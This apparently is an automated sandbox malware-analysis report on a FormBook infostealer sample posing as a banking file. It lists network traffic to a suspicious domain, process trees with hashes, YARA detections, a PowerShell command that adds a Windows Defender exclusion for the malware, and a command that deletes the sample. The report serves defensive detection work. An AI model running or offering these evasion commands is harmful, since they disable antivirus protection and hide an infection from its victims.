Oct 1, 2024 14:48:05.555167913 CEST	925	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 01 Oct 2024 12:48:05 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Tue, 01 Oct 2024 13:48:05 GMT Location: https://www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2M5EXnHnqMzvqEnmohydAD0GTx4KJSrhZ29Za54JAflM3sqTVff5lErCYaean95guDhwBtweregCFjQRk49ZVS2FFDNDXdl4z3Atzgtuz7k8B60ivHrr%2FW5GtvQDHdvdBw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cbc90a25d570f77-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Target ID:	0
Start time:	08:46:05
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\hbwebdownload - MT 103.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Imagebase:	0xb50000
File size:	676'872 bytes
MD5 hash:	42D6700F5272596C025308992D4FEA37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2092991914.000000000484A000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	08:46:06
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Imagebase:	0xce0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	08:46:06
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\hbwebdownload - MT 103.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Imagebase:	0x850000
File size:	676'872 bytes
MD5 hash:	42D6700F5272596C025308992D4FEA37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2140305383.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Target ID:	5
Start time:	08:46:06
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	08:46:06
Start date:	01/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	7
Start time:	08:46:10
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\colorcpl.exe"
Imagebase:	0x8e0000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4524389651.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4523888584.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4524319373.0000000002BF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Target ID:	8
Start time:	08:46:14
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\hbwebdownload - MT 103.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	9
Start time:	08:46:14
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true